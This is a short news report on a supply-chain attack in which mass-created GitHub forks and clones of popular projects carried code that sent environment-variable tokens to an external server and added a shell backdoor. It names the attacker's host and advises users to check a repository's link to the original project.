GitHub has identified activity in the mass creation of forks and clones of popular projects, with the introduction of malicious changes into copies, including a backdoor. A search by host name (ovz1.j19544519.pr46m.vps.myjino.ru), which is accessed from the malicious code, showed more than 35 thousand changes in GitHub, present in clones and forks of various repositories, including forks of crypto, golang, python, js, bash, docker and k8s.
The attack is aimed at the fact that the user will not track the original and will use the code from a fork or clone with a slightly different name instead of the main project repository. Currently, GitHub has already removed most of the forks with malicious insertion. Users coming to GitHub from search engines are advised to carefully check the relationship of the repository to the main project before using the code from it.
The added malicious code sent the contents of environment variables to an external server with the expectation of stealing tokens to AWS and continuous integration systems. In addition, a backdoor was integrated into the code that runs shell commands returned after sending a request to the attacker's server. Most of the malicious changes were added between 6 and 20 days ago, but there are separate repositories where malicious code has been traced since 2015.
Source: opennet.ru